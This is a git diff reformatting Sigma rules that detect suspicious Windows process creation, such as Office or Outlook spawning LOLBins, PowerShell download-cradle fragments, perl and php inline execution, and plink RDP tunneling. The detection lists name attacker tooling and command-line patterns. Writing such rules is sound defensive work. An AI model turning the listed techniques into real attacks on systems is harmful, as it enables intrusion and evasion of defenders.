\ieexec.exe + - \installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe selection_opt_explorer: - CommandLine|contains: + CommandLine|contains: - .hta - .vb - .wsh @@ -109,9 +106,9 @@ detection: - .pif - .bat - .cmd - NewProcessName|endswith: \explorer.exe + NewProcessName|endswith: \explorer.exe selection_opt_paths: - NewProcessName|contains: + NewProcessName|contains: - \AppData\ - \Users\Public\ - \ProgramData\ @@ -119,14 +116,13 @@ detection: - \Windows\Temp\ - \Windows\System32\Tasks\ filter_teams: - CommandLine|endswith: -Embedding - NewProcessName|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe + CommandLine|endswith: -Embedding + NewProcessName|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe filter_onedrive: - CommandLine|endswith: -Embedding - NewProcessName|contains: \AppData\Local\Microsoft\OneDrive\ - NewProcessName|endswith: \FileCoAuth.exe - condition: process_creation and (selection_parent and 1 of selection_opt_* and - not 1 of filter_*) + CommandLine|endswith: -Embedding + NewProcessName|contains: \AppData\Local\Microsoft\OneDrive\ + NewProcessName|endswith: \FileCoAuth.exe + condition: process_creation and (selection_parent and 1 of selection_opt_* and not 1 of filter_*) falsepositives: - File located in the AppData folder with trusted signature level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml index 83013d71e..743593da6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml @@ -1,11 +1,10 @@ title: Outlook EnableUnsafeClientMailRules Setting Enabled id: 55f0a3a1-846e-40eb-8273-677371b8d912 related: - - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 - type: similar + - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # Registry variation + type: similar status: test -description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" - which allows outlook to run applications or execute macros +description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros references: - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 @@ -25,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules + CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml index 39bae894c..09696daa8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml @@ -16,7 +16,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: \Temporary Internet Files\Content.Outlook\ + NewProcessName|contains: \Temporary Internet Files\Content.Outlook\ condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml index 45109b60b..632d8d5e3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml @@ -1,17 +1,16 @@ title: Suspicious Outlook Child Process id: 208748f7-881d-47ac-a29c-07ea84bf691d related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived - - id: e212d415-0e93-435f-9e1a-f29005bb4723 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Office Child Processes + type: derived + - id: e212d415-0e93-435f-9e1a-f29005bb4723 # Outlook Remote Child Process + type: derived status: test description: Detects a suspicious process spawning from an Outlook process. references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye - Team +author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team date: 2022/02/28 modified: 2023/02/04 tags: @@ -26,7 +25,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \OUTLOOK.EXE - NewProcessName|endswith: + NewProcessName|endswith: - \AppVLP.exe - \bash.exe - \cmd.exe @@ -34,8 +33,8 @@ detection: - \forfiles.exe - \hh.exe - \mftrace.exe - - \msbuild.exe - - \msdt.exe + - \msbuild.exe # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml + - \msdt.exe # CVE-2022-30190 - \mshta.exe - \msiexec.exe - \powershell.exe @@ -45,9 +44,22 @@ detection: - \scrcons.exe - \scriptrunner.exe - \sh.exe - - \svchost.exe - - \wmic.exe + - \svchost.exe # https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe + # Several FPs with rundll32.exe + # We started excluding specific use cases and ended up commenting out the rundll32.exe sub processes completely + # - '\rundll32.exe' + # filter_outlook_photoviewer: # https://twitter.com/Luke_Hamp/status/1495919717760237568 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains: '\PhotoViewer.dll' + # filter_outlook_printattachments: # https://twitter.com/KickaKamil/status/1496238278659485696 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains|all: + # - 'shell32.dll,Control_RunDLL' + # - '\SYSTEM32\SPOOL\DRIVERS\' condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml index c73e36922..7421728bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml @@ -1,11 +1,10 @@ title: Suspicious Remote Child Process From Outlook id: e212d415-0e93-435f-9e1a-f29005bb4723 related: - - id: 208748f7-881d-47ac-a29c-07ea84bf691d - type: similar + - id: 208748f7-881d-47ac-a29c-07ea84bf691d # Outlook Child Processes + type: similar status: test -description: Detects a suspicious child process spawning from Outlook where the image - is located in a remote location (SMB/WebDav shares). +description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). references: - https://github.com/sensepost/ruler - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html @@ -26,7 +25,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \outlook.exe - NewProcessName|startswith: \\\\ + NewProcessName|startswith: \\\\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml b/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml index 5c1ff930a..faa184519 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml @@ -1,8 +1,7 @@ title: Suspicious Binary In User Directory Spawned From Office Application id: aa3a6f94-890e-4e22-b634-ffdfd54792cc status: test -description: Detects an executable in the users directory started from one of the - Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) +description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) references: - https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign - https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57 @@ -30,10 +29,11 @@ detection: - \VISIO.exe - \MSACCESS.exe - \EQNEDT32.exe - NewProcessName|startswith: C:\users\ - NewProcessName|endswith: .exe + # - '\OUTLOOK.EXE' too many FPs + NewProcessName|startswith: C:\users\ + NewProcessName|endswith: .exe filter: - NewProcessName|endswith: \Teams.exe + NewProcessName|endswith: \Teams.exe condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml index 22bf9d762..7e7b28323 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml @@ -1,19 +1,18 @@ title: Suspicious Microsoft Office Child Process id: 438025f9-5856-4663-83f7-52f878a70a50 related: - - id: c27515df-97a9-4162-8a60-dc0eeb51b775 - type: derived - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 - type: obsoletes - - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a - type: obsoletes - - id: 04f5363a-6bca-42ff-be70-0d28bf629ead - type: obsoletes + - id: c27515df-97a9-4162-8a60-dc0eeb51b775 # Speicifc OneNote rule due to its recent usage in phishing attacks + type: derived + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 + type: obsoletes + - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a + type: obsoletes + - id: 04f5363a-6bca-42ff-be70-0d28bf629ead + type: obsoletes status: test -description: Detects a suspicious process spawning from one of the Microsoft Office - suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html @@ -26,8 +25,7 @@ references: - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html - https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ -author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, - Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io date: 2018/04/06 modified: 2023/04/24 tags: @@ -56,78 +54,78 @@ detection: - \wordpad.exe - \wordview.exe selection_child_processes: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - NewProcessName|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe - selection_child_susp_paths: - NewProcessName|contains: + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - NewProcessName|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - \curl.exe + - \forfiles.exe + - \hh.exe + - \ieexec.exe + - \installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe + selection_child_susp_paths: # Idea: Laiali Kazalbach, Mohamed Elsayed (#4142) + NewProcessName|contains: - \AppData\ - \Users\Public\ - \ProgramData\ diff --git a/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml b/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml index 580eccce7..4975a3cbb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml @@ -1,11 +1,10 @@ title: Potential Arbitrary DLL Load Using Winword id: f7375e28-5c14-432f-b8d1-1db26c832df3 related: - - id: 2621b3a6-3840-4810-ac14-a02426086171 - type: obsoletes + - id: 2621b3a6-3840-4810-ac14-a02426086171 + type: obsoletes status: test -description: Detects potential DLL sideloading using the Microsoft Office winword - process via the '/l' flag. +description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. references: - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py author: Victor Sergeev, oscd.community @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WINWORD.exe - - OriginalFileName: WinWord.exe + - NewProcessName|endswith: \WINWORD.exe + - OriginalFileName: WinWord.exe selection_dll: - CommandLine|contains|all: + CommandLine|contains|all: - '/l ' - .dll condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml b/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml index f9ab4dbbe..058a9d85f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml @@ -1,13 +1,9 @@ title: Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution id: 02b18447-ea83-4b1b-8805-714a8a34546a status: test -description: 'Detects execution of Windows Defender "OfflineScannerShell.exe" from - its non standard directory. - - The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will - load any DLL named "mpclient.dll" from the current working directory. - - ' +description: | + Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. + The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory. references: - https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/ author: frack113 @@ -24,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \OfflineScannerShell.exe - - OriginalFileName: OfflineScannerShell.exe + - NewProcessName|endswith: \OfflineScannerShell.exe + - OriginalFileName: OfflineScannerShell.exe filter_main_legit_dir: CurrentDirectory: C:\Program Files\Windows Defender\Offline\ filter_main_empty: CurrentDirectory: '' filter_main_null: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml b/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml index 26c5c88da..cd2e1ff47 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml @@ -1,12 +1,10 @@ title: Suspicious Execution Of PDQDeployRunner id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 related: - - id: d679950c-abb7-43a6-80fb-2a480c4fc450 - type: similar + - id: d679950c-abb7-43a6-80fb-2a480c4fc450 + type: similar status: test -description: Detects suspicious execution of "PDQDeployRunner" which is part of the - PDQDeploy service stack that is responsible for executing commands and packages - on a remote machines +description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines references: - https://twitter.com/malmoeb/status/1550483085472432128 author: Nasreddine Bencherchali (Nextron Systems) @@ -23,35 +21,37 @@ detection: selection_parent: ParentProcessName|contains: PDQDeployRunner- selection_susp: - - NewProcessName|endswith: - - \wscript.exe - - \cscript.exe - - \rundll32.exe - - \regsvr32.exe - - \wmic.exe - - \msiexec.exe - - \mshta.exe - - \csc.exe - - \dllhost.exe - - \certutil.exe - - \scriptrunner.exe - - \bash.exe - - \wsl.exe - - NewProcessName|contains: - - C:\Users\Public\ - - C:\ProgramData\ - - C:\Windows\TEMP\ - - \AppData\Local\Temp - - CommandLine|contains: - - 'iex ' - - Invoke- - - DownloadString - - http - - ' -enc ' - - ' -encodedcommand ' - - FromBase64String - - ' -decode ' - - ' -w hidden' + # Improve this section by adding other suspicious processes, commandlines or paths + - NewProcessName|endswith: + # If you use any of the following processes legitimately comment them out + - \wscript.exe + - \cscript.exe + - \rundll32.exe + - \regsvr32.exe + - \wmic.exe + - \msiexec.exe + - \mshta.exe + - \csc.exe + - \dllhost.exe + - \certutil.exe + - \scriptrunner.exe + - \bash.exe + - \wsl.exe + - NewProcessName|contains: + - C:\Users\Public\ + - C:\ProgramData\ + - C:\Windows\TEMP\ + - \AppData\Local\Temp + - CommandLine|contains: + - 'iex ' + - Invoke- + - DownloadString + - http + - ' -enc ' + - ' -encodedcommand ' + - FromBase64String + - ' -decode ' + - ' -w hidden' condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the PDQDeploy tool to execute these commands diff --git a/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml index ef0c7501b..26ac4650e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Perl Inline Command Execution id: f426547a-e0f7-441a-b63e-854ac5bdf54d status: test -description: Detects execution of perl using the "-e"/"-E" flags. This is could be - used as a way to launch a reverse shell or execute live perl code. +description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \perl.exe - - OriginalFileName: perl.exe + - NewProcessName|endswith: \perl.exe + - OriginalFileName: perl.exe # Also covers perlX.XX.exe selection_cli: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml index 1169ae6b6..360af07b0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Php Inline Command Execution id: d81871ef-5738-47ab-9797-7a9c90cd4bfb status: test -description: Detects execution of php using the "-r" flag. This is could be used as - a way to launch a reverse shell or execute live php code. +description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. references: - https://www.php.net/manual/en/features.commandline.php - https://www.revshells.com/ @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \php.exe - - OriginalFileName: php.exe + - NewProcessName|endswith: \php.exe + - OriginalFileName: php.exe selection_cli: - CommandLine|contains: ' -r' + CommandLine|contains: ' -r' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml b/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml index 74d96e35c..4a00c9cd5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: 0x - NewProcessName|endswith: \ping.exe + CommandLine|contains: 0x + NewProcessName|endswith: \ping.exe condition: process_creation and selection fields: - ParentCommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml index ab7e30100..bf6072ff3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \pktmon.exe - - OriginalFileName: PktMon.exe + - NewProcessName|endswith: \pktmon.exe + - OriginalFileName: PktMon.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml b/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml index 893685873..d164dbe64 100644 --- a/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml +++ b/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml @@ -1,8 +1,8 @@ title: Potential RDP Tunneling Via SSH Plink id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da related: - - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d - type: similar + - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d # ssh.exe + type: similar status: test description: Execution of plink to perform data exfiltration and tunneling references: @@ -21,13 +21,13 @@ detection: EventID: 4688 Channel: Security selection_a: - CommandLine|contains: :127.0.0.1:3389 - NewProcessName|endswith: \plink.exe + CommandLine|contains: :127.0.0.1:3389 + NewProcessName|endswith: \plink.exe selection_b1: - CommandLine|contains: :3389 - NewProcessName|endswith: \plink.exe + CommandLine|contains: :3389 + NewProcessName|endswith: \plink.exe selection_b2: - CommandLine|contains: + CommandLine|contains: - ' -P 443' - ' -P 22' condition: process_creation and (selection_a or all of selection_b*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml index 113317075..8b9acf5b4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Powercfg Execution To Change Lock Screen Timeout id: f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b status: test -description: Detects suspicious execution of 'Powercfg.exe' to change lock screen - timeout +description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options @@ -18,17 +17,20 @@ detection: EventID: 4688 Channel: Security selection_power: - - NewProcessName|endswith: \powercfg.exe - - OriginalFileName: PowerCfg.exe + - NewProcessName|endswith: \powercfg.exe + - OriginalFileName: PowerCfg.exe selection_standby: - - CommandLine|contains|all: - - '/setacvalueindex ' - - SCHEME_CURRENT - - SUB_VIDEO - - VIDEOCONLOCK - - CommandLine|contains|all: - - '-change ' - - -standby-timeout- + # powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK + - CommandLine|contains|all: + - '/setacvalueindex ' + - SCHEME_CURRENT + - SUB_VIDEO + - VIDEOCONLOCK + # powercfg -change -standby-timeout-dc 3000 + # powercfg -change -standby-timeout-ac 3000 + - CommandLine|contains|all: + - '-change ' + - -standby-timeout- condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml index ad06db8b1..a305852a2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml @@ -1,12 +1,10 @@ title: AADInternals PowerShell Cmdlets Execution - ProccessCreation id: c86500e9-a645-4680-98d7-f882c70c1ea3 related: - - id: 91e69562-2426-42ce-a647-711b8152ced6 - type: similar + - id: 91e69562-2426-42ce-a647-711b8152ced6 + type: similar status: test -description: Detects ADDInternals Cmdlet execution. A tool for administering Azure - AD and Office 365. Which can be abused by threat actors to attack Azure AD or - Office 365. +description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals @@ -26,14 +24,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.Exe - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.Exe + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: + # Since most of the cmdlets use a unique enough string which is "-AADInt" we only used that portion. For a complete list please check the references linked above - Add-AADInt - ConvertTo-AADInt - Disable-AADInt diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml index ac6b9874e..0000de9ea 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml @@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - ProcCreation id: 70bc5215-526f-4477-963c-a47a5c9ebd12 related: - - id: 9e620995-f2d8-4630-8430-4afd89f77604 - type: similar - - id: 74176142-4684-4d8a-8b0a-713257e7df8e - type: similar + - id: 9e620995-f2d8-4630-8430-4afd89f77604 + type: similar + - id: 74176142-4684-4d8a-8b0a-713257e7df8e + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 @@ -26,18 +25,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' selection_dll: - CommandLine|contains: Microsoft.ActiveDirectory.Management.dll + CommandLine|contains: Microsoft.ActiveDirectory.Management.dll condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the library for administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml index 7b67730a6..73b32ff77 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml @@ -1,11 +1,10 @@ title: Add Windows Capability Via PowerShell Cmdlet id: b36d01a3-ddaf-4804-be18-18a6247adfcd 